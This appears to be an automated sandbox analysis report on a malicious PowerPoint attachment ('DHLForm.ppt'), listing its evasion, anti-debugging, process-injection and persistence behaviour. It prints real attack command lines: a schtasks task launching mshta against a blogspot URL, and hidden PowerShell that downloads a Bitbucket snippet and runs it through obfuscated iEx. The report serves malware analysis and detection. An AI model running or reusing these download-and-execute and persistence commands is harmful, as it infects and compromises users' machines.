Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6156, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7044, type: MEMORYSTR
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6420 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6300 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6424 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6348 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4464 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 64 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 972 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 2607 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5112 Thread sleep count: 3614 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2708 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1430 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5335
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1450
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 2607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 3614
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.dll Jump to dropped file
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000016.00000002.517217825.000001ACCCBF0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW0
Source: mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp, mshta.exe, 00000021.00000002.536287694.00000214EFFBD000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000001B.00000002.538001966.0000020DA13BB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW>
Source: mshta.exe, 0000001D.00000002.537059135.000001B6E5E4B000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW`
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\mshta.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.0.cs Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\dtsgyyde\dtsgyyde.0.cs Jump to dropped file
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: unknown base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10E4008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 438000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 123E008
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\''
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '' Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline' Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP'
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Progman
Source: mshta.exe, 0000001B.00000002.544567008.0000020DA1810000.00000002.00020000.sdmp, mshta.exe, 0000001D.00000002.543690076.000001B6E63A0000.00000002.00020000.sdmp, mshta.exe, 00000021.00000002.545186424.00000214F0640000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
